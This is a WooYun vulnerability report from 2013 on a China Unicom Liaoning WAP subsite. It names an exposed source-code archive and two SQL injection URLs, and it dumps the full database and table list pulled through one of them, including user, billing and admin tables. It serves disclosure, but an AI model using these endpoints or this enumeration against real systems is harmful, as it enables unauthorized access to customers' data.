当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044447

漏洞标题:联通#联通某分站多处安全漏洞

相关厂商:中国联通

漏洞作者: HackBraid

提交时间:2013-12-03 11:20

修复时间:2014-01-17 11:21

公开时间:2014-01-17 11:21

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-03: 细节已通知厂商并且等待厂商处理中
2013-12-07: 厂商已经确认,细节仅向厂商公开
2013-12-17: 细节向核心白帽子及相关领域专家公开
2013-12-27: 细节向普通白帽子公开
2014-01-06: 细节向实习白帽子公开
2014-01-17: 细节向公众公开

简要描述:

RT,见详细说明。
漏洞的严重程度是建立在服务器是否被入侵

详细说明:

1.http://ln.wap.wo.com.cn 联通 沃•辽宁
2.扫描的过程中发先cc.rar,不小心点击下载了下,发现是该站的源码!
链接:http://ln.wap.wo.com.cn/ivod/i/cc.rar

wo.jpg


3.我想应该是被入侵了吧!
4.其实我是奔着SQL注入来的,再发两枚未修复的SQL注入
注入点1:http://ln.wap.wo.com.cn/ivod/i/home/Play.aspx?vid=XNDI0MjM1NTgw&cid=98
注入点2:http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8

漏洞证明:

只发注入点1跑出来的表吧,

Database: iportal_active
[4 tables]
+----------------------------------------------+
| accessinfo                                   |
| news                                         |
| newstype                                     |
| wish                                         |
+----------------------------------------------+
Database: lniportal2
[21 tables]
+----------------------------------------------+
| accessinfo                                   |
| integration                                  |
| nav                                          |
| smslog                                       |
| tbl_userdayscore                             |
| tbl_userinfo                                 |
| tbl_userinfo_mem                             |
| tbl_userinfo_mem1                            |
| tbl_userinfo_tmp                             |
| tbl_userlucky                                |
| tbl_usermonthscore                           |
| tbl_userrecord                               |
| tbl_userscore                                |
| tbl_usertempscore                            |
| tbl_winncode                                 |
| tbl_winnrecord                               |
| userinfo                                     |
| usermessage                                  |
| usermob                                      |
| usernav                                      |
| userweb                                      |
+----------------------------------------------+
Database: activedata
[15 tables]
+----------------------------------------------+
| accessdata                                   |
| messages                                     |
| provinceconn                                 |
| rules                                        |
| s_push_module                                |
| s_push_module_range                          |
| s_push_module_usergroup                      |
| s_push_operation_group                       |
| s_push_usergroup                             |
| s_push_userlog                               |
| s_push_usermanage                            |
| tjlist                                       |
| user_msgs                                    |
| users                                        |
| websites                                     |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
| user                                         |
+----------------------------------------------+
Database: lniportal3
[31 tables]
+----------------------------------------------+
| accessinfo                                   |
| content_detail                               |
| content_type                                 |
| integration                                  |
| membership_module                            |
| membership_module_1                          |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| nav                                          |
| policy                                       |
| policytype                                   |
| s_site                                       |
| s_type                                       |
| smslog                                       |
| tbl_userdayscore                             |
| tbl_userinfo                                 |
| tbl_userinfo_mem1                            |
| tbl_userinfo_tmp                             |
| tbl_userlucky                                |
| tbl_usermonthscore                           |
| tbl_userrecord                               |
| tbl_userscore                                |
| tbl_usertempscore                            |
| tbl_winncode                                 |
| tbl_winnrecord                               |
| userinfo                                     |
| usermessage                                  |
| usermob                                      |
| usernav                                      |
| userweb                                      |
+----------------------------------------------+
Database: phonebasedb
[2 tables]
+----------------------------------------------+
| ota                                          |
| uservac                                      |
+----------------------------------------------+
Database: iportal
[102 tables]
+----------------------------------------------+
| `billing-query-log-mobtemp`                  |
| `billing-query-log-temp`                     |
| act_enname                                   |
| aircity                                      |
| airline                                      |
| basemodule                                   |
| beitaifilm                                   |
| beitaifilmphoto                              |
| billinginfo                                  |
| billinginfotemp                              |
| book                                         |
| booktype                                     |
| brand                                        |
| city                                         |
| cyphone                                      |
| editnews                                     |
| enewscontent                                 |
| enewsrule                                    |
| enewstype                                    |
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| gprslog                                      |
| gprsupday                                    |
| group                                        |
| ipaddress                                    |
| iphonemms                                    |
| iphonemmstype                                |
| iphonenews                                   |
| iphonenewstype                               |
| link                                         |
| linktype                                     |
| mangergroup                                  |
| mangeruser                                   |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| mms                                          |
| mmstype                                      |
| module                                       |
| news                                         |
| newspaper                                    |
| newsphoto                                    |
| newsrule                                     |
| newstype                                     |
| page                                         |
| phone                                        |
| productfeeinfo                               |
| proinfo                                      |
| proinfotemp                                  |
| snsfriend                                    |
| snsmyfarm                                    |
| snsotherfarm                                 |
| snsotherfarmo                                |
| snsuser                                      |
| spcount                                      |
| spinfo                                       |
| spinfotemp                                   |
| srvinfo                                      |
| srvinfotemp                                  |
| story                                        |
| storytype                                    |
| subvideo                                     |
| syslog                                       |
| template                                     |
| theme                                        |
| ua                                           |
| ua_bk                                        |
| user                                         |
| usergooglekey                                |
| userkey                                      |
| usermodule                                   |
| usersfav                                     |
| vacguid                                      |
| vaclog                                       |
| vacquery                                     |
| video                                        |
| videotype                                    |
| wap                                          |
| wapfilm                                      |
| wapfilmtype                                  |
| wapgame                                      |
| wapgamenews                                  |
| wapgametype                                  |
| waplink                                      |
| wapmagazine                                  |
| wapmagazinetype                              |
| wapmusic                                     |
| wapmusiciphone                               |
| wapmusiciphonetype                           |
| wapmusictype                                 |
| wapringtones                                 |
| waptype                                      |
| weather                                      |
| yx_farm                                      |
+----------------------------------------------+
Database: iportal_res
[70 tables]
+----------------------------------------------+
| 3quseraddress                                |
| active_phoneanswer                           |
| active_phonecharge                           |
| active_phonejf                               |
| active_phonevideo                            |
| christmas                                    |
| city                                         |
| content_constell                             |
| content_constellrule                         |
| content_constelltype                         |
| content_navigation                           |
| fuser                                        |
| gprs                                         |
| gquseraddress                                |
| lnseckill                                    |
| mem                                          |
| micro_content                                |
| micro_userpeak                               |
| new_banner                                   |
| news                                         |
| news_address                                 |
| news_adver                                   |
| news_array                                   |
| news_commont                                 |
| news_microtopic                              |
| news_sensitiveword                           |
| newscopy                                     |
| newsrule                                     |
| newstype                                     |
| newstypemapping                              |
| olyl                                         |
| olylcomment                                  |
| olympic                                      |
| olyquest                                     |
| p_3g                                         |
| p_all                                        |
| p_callback                                   |
| p_content                                    |
| p_crbt                                       |
| p_gprs                                       |
| p_mobileemail                                |
| p_mobiletv                                   |
| p_newslist                                   |
| p_newsmobile                                 |
| p_read                                       |
| p_sms                                        |
| phonetable                                   |
| products                                     |
| pushurl                                      |
| pushurl_android                              |
| pushurl_iphone                               |
| random                                       |
| t_order                                      |
| t_record                                     |
| t_topic                                      |
| tbl_exchangerecord                           |
| tbl_userdayscore                             |
| tbl_userguide                                |
| tbl_userinfo                                 |
| tbl_userlucky                                |
| tbl_usermonthscore                           |
| tbl_userrecord                               |
| tbl_winncode                                 |
| tbl_winnrecord                               |
| teacherqx                                    |
| us                                           |
| userlook                                     |
| vaccodeinfo                                  |
| vaclog                                       |
| winnertable                                  |
+----------------------------------------------+
Database: lniportal2test
[21 tables]
+----------------------------------------------+
| accessinfo                                   |
| integration                                  |
| nav                                          |
| smslog                                       |
| tbl_userdayscore                             |
| tbl_userinfo                                 |
| tbl_userinfo_mem                             |
| tbl_userinfo_mem1                            |
| tbl_userinfo_tmp                             |
| tbl_userlucky                                |
| tbl_usermonthscore                           |
| tbl_userrecord                               |
| tbl_userscore                                |
| tbl_usertempscore                            |
| tbl_winncode                                 |
| tbl_winnrecord                               |
| userinfo                                     |
| usermessage                                  |
| usermob                                      |
| usernav                                      |
| userweb                                      |
+----------------------------------------------+
Database: lniportal
[31 tables]
+----------------------------------------------+
| accessinfo                                   |
| content_detail                               |
| content_type                                 |
| integration                                  |
| membership_module                            |
| membership_module_1                          |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| nav                                          |
| policy                                       |
| policytype                                   |
| s_site                                       |
| s_type                                       |
| smslog                                       |
| tbl_userdayscore                             |
| tbl_userinfo                                 |
| tbl_userinfo_mem1                            |
| tbl_userinfo_tmp                             |
| tbl_userlucky                                |
| tbl_usermonthscore                           |
| tbl_userrecord                               |
| tbl_userscore                                |
| tbl_usertempscore                            |
| tbl_winncode                                 |
| tbl_winnrecord                               |
| userinfo                                     |
| usermessage                                  |
| usermob                                      |
| usernav                                      |
| userweb                                      |
+----------------------------------------------+
Database: inav_p
[10 tables]
+----------------------------------------------+
| a_day_count                                  |
| a_hour_count                                 |
| inav_phone                                   |
| inav_phone_history                           |
| s_module                                     |
| s_module_range                               |
| s_module_usergroup                           |
| s_usergroup                                  |
| s_userlog                                    |
| s_usermanage                                 |
+----------------------------------------------+
Database: inav
[3 tables]
+----------------------------------------------+
| orderhistory                                 |
| orderjiang                                   |
| qudao_count                                  |
+----------------------------------------------+
Database: iflowt2
[20 tables]
+----------------------------------------------+
| accessinfo                                   |
| b_city                                       |
| b_province                                   |
| content_ad                                   |
| flow_active                                  |
| flow_actives                                 |
| flow_message                                 |
| flow_module                                  |
| flow_product                                 |
| flow_style                                   |
| flow_template                                |
| iflow_protype                                |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| ordererrorhistory                            |
| orderhistory                                 |
| pro_config                                   |
| tongjixs_day                                 |
+----------------------------------------------+
Database: icenter
[24 tables]
+----------------------------------------------+
| accessinfo                                   |
| accessinfo_cloud                             |
| accessinfo_flow                              |
| accessinfo_news                              |
| accessinfo_user                              |
| accessinfo_video                             |
| base_avgflow                                 |
| base_flowinfo                                |
| base_iis_address                             |
| base_iis_log                                 |
| base_iis_pv                                  |
| base_marketinfo                              |
| base_marketinfo_report                       |
| base_plan                                    |
| base_provinceinfo                            |
| base_targetinfo                              |
| cdr                                          |
| cdr_address                                  |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| table_login                                  |
| wservice                                     |
+----------------------------------------------+
Database: gx_login
[2 tables]
+----------------------------------------------+
| gx_login                                     |
| gx_login1                                    |
+----------------------------------------------+
Database: ivodnew
[34 tables]
+----------------------------------------------+
| accessinfo                                   |
| accessinfowo                                 |
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| phone                                        |
| pmtext                                       |
| user                                         |
| vod_ao                                       |
| vod_business                                 |
| vod_mp4_rule                                 |
| vod_nokiasubvideo                            |
| vod_nokiavtype                               |
| vod_programme                                |
| vod_rtsp_rule                                |
| vod_spdetail                                 |
| vod_subvideo                                 |
| vod_subvideo2                                |
| vod_users                                    |
| vod_uservideo                                |
| vod_video                                    |
| vod_vtype                                    |
| vod_zhuanti                                  |
| vod_zhuantidetail                            |
+----------------------------------------------+
Database: nav
[28 tables]
+----------------------------------------------+
| _msmtype                                     |
| _smshistory                                  |
| _smsinfo                                     |
| _smsinfotemp                                 |
| activeuser                                   |
| daysite                                      |
| daysitetemp                                  |
| dyusertype                                   |
| dywebsite                                    |
| dywebtype                                    |
| mobstyle                                     |
| module                                       |
| module_usergroup                             |
| phone                                        |
| phonestyle                                   |
| product                                      |
| productcontent                               |
| ser_keyword                                  |
| temp_week_stream                             |
| tempdyusertype                               |
| usergroup                                    |
| userlinkinfo                                 |
| usermanage                                   |
| usermylinkinfo                               |
| usermysite                                   |
| useronlineinfo                               |
| userreg                                      |
| users                                        |
+----------------------------------------------+
Database: qx
[2 tables]
+----------------------------------------------+
| mobilecontent                                |
| saycontent                                   |
+----------------------------------------------+
Database: test
[2 tables]
+----------------------------------------------+
| temp_tbl                                     |
| temp_tbl1                                    |
+----------------------------------------------+
Database: iportal_wx
[15 tables]
+----------------------------------------------+
| messages                                     |
| news                                         |
| newtype                                      |
| rules                                        |
| s_push_module                                |
| s_push_module_range                          |
| s_push_module_usergroup                      |
| s_push_operation_group                       |
| s_push_usergroup                             |
| s_push_userlog                               |
| s_push_usermanage                            |
| user_msgs                                    |
| user_wx                                      |
| userlog                                      |
| users                                        |
+----------------------------------------------+
Database: iportal_ln
[45 tables]
+----------------------------------------------+
| b_city                                       |
| b_district                                   |
| b_host                                       |
| b_os                                         |
| b_province                                   |
| content_ad                                   |
| content_ads                                  |
| content_apptype                              |
| content_detail                               |
| content_province                             |
| content_type                                 |
| flowordererrorhistory                        |
| floworderhistory                             |
| key_commend                                  |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| newuserwenda                                 |
| pepsi_code                                   |
| res_app                                      |
| res_site                                     |
| res_site_iphone                              |
| res_type                                     |
| siteinfo                                     |
| sitetype                                     |
| tbl_integrate_type                           |
| tbl_notice                                   |
| tbl_userdayscore                             |
| tbl_userinfo                                 |
| tbl_userinfo_tmp                             |
| tbl_userlucky                                |
| tbl_usermonthscore                           |
| tbl_userrecord                               |
| tbl_userscore                                |
| tbl_usertempscore                            |
| tbl_winncode                                 |
| tbl_winnrecord                               |
| user_app                                     |
| user_info                                    |
| user_integration                             |
| user_msg                                     |
| user_nav                                     |
| user_product                                 |
| user_web                                     |
+----------------------------------------------+
Database: i_report
[13 tables]
+----------------------------------------------+
| activity_data                                |
| activity_url                                 |
| d1z_data                                     |
| day_3g_user                                  |
| ln_daohang_report                            |
| ln_udr_report                                |
| log_data                                     |
| log_data_bak                                 |
| r_udr                                        |
| tb_flow                                      |
| yx_ouzb                                      |
| yx_ouzb1                                     |
| yx_ouzb2                                     |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_BUFFER_PAGE                           |
| INNODB_BUFFER_PAGE_LRU                       |
| INNODB_BUFFER_POOL_STATS                     |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
Database: ishwapv3
[20 tables]
+----------------------------------------------+
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| mangergroup                                  |
| mangeruser                                   |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| module                                       |
| module_usergroup                             |
| tempmodule                                   |
| usergroup                                    |
| usermanage                                   |
+----------------------------------------------+
Database: iportal_ln_log
[10 tables]
+----------------------------------------------+
| flowordererrorhistory                        |
| floworderhistory                             |
| log_dz                                       |
| log_event                                    |
| log_integrate                                |
| log_page                                     |
| log_sms                                      |
| log_upv                                      |
| qudao_count                                  |
| tongjixs_day                                 |
+----------------------------------------------+
Database: iportaladmin
[17 tables]
+----------------------------------------------+
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| iportalanalysis_accessinfo                   |
| iportalanalysis_accessinfo_201305            |
| iportalanalysis_accessinfo_temp              |
| iportalanalysis_analysis_day                 |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
+----------------------------------------------+
Database: iportalv2
[44 tables]
+----------------------------------------------+
| activitycontent                              |
| activitytogather                             |
| bsay                                         |
| bsendsms                                     |
| christmas                                    |
| christmasv1                                  |
| cupschedule                                  |
| cysay                                        |
| cysendsms                                    |
| editnews                                     |
| enewscontent                                 |
| enewsrule                                    |
| enewstype                                    |
| gatherpv                                     |
| gesendsms                                    |
| glsay                                        |
| glsendsms                                    |
| hallo                                        |
| mircoblog_ishwap                             |
| mircoblog_user                               |
| mobmessage                                   |
| module                                       |
| news                                         |
| newsphoto                                    |
| newsrule                                     |
| newsrulebk                                   |
| newstype                                     |
| newstypebk                                   |
| olyl                                         |
| olympic                                      |
| olyquest                                     |
| phone                                        |
| photo                                        |
| phototype                                    |
| pushurl                                      |
| qixisay                                      |
| qixisendsms                                  |
| qixitoupiao                                  |
| sina_user                                    |
| tbl_togather                                 |
| winlist                                      |
| zqsay                                        |
| zqsendsms                                    |
| zqtoupiao                                    |
+----------------------------------------------+
Database: sdc
[1 table]
+----------------------------------------------+
| drives                                       |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: activet
[12 tables]
+----------------------------------------------+
| accessdata                                   |
| accessinfo                                   |
| game_competence                              |
| game_competence_log                          |
| ichildren_prize                              |
| joinhistory                                  |
| log_url                                      |
| orderhistory                                 |
| qudao_count                                  |
| rec_usermob                                  |
| watch_video_log                              |
| wmshare                                      |
+----------------------------------------------+
Database: iflowt
[18 tables]
+----------------------------------------------+
| accessinfo                                   |
| b_city                                       |
| b_province                                   |
| flow_active                                  |
| flow_message                                 |
| flow_module                                  |
| flow_product                                 |
| flow_style                                   |
| flow_template                                |
| iflow_protype                                |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| ordererrorhistory                            |
| orderhistory                                 |
| pro_config                                   |
| tongjixs_day                                 |
+----------------------------------------------+
Database: ivodcloud
[5 tables]
+----------------------------------------------+
| ivod                                         |
| ivodfile                                     |
| ivodrulelink                                 |
| newstype                                     |
| vodcollection                                |
+----------------------------------------------+
Database: iportal_site
[2 tables]
+----------------------------------------------+
| res_app                                      |
| res_type                                     |
+----------------------------------------------+
Database: ivod
[35 tables]
+----------------------------------------------+
| accessinfo                                   |
| accessinfo_ao                                |
| accessinfoday                                |
| accessinfowo                                 |
| frame_basemodule                             |
| frame_channel                                |
| frame_headphoto                              |
| frame_module                                 |
| frame_moduletemp                             |
| frame_page                                   |
| frame_recommend                              |
| frame_template                               |
| frame_theme                                  |
| membership_module                            |
| membership_module_usergroup                  |
| membership_usergroup                         |
| membership_usermanage                        |
| phone                                        |
| user                                         |
| vod_ao                                       |
| vod_business                                 |
| vod_mp4_rule                                 |
| vod_nokiasubvideo                            |
| vod_nokiavtype                               |
| vod_programme                                |
| vod_rtsp_rule                                |
| vod_spdetail                                 |
| vod_subvideo                                 |
| vod_subvideo2                                |
| vod_users                                    |
| vod_uservideo                                |
| vod_video                                    |
| vod_vtype                                    |
| vod_zhuanti                                  |
| vod_zhuantidetail                            |
+----------------------------------------------+

修复方案:

严重性不言而喻,修复只给建议,你们的维护是专业的!
1.对存在SQL注入的页面的字符进行严格过滤
2.服务器的定期维护

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-07 23:56

厂商回复:

最新状态:

暂无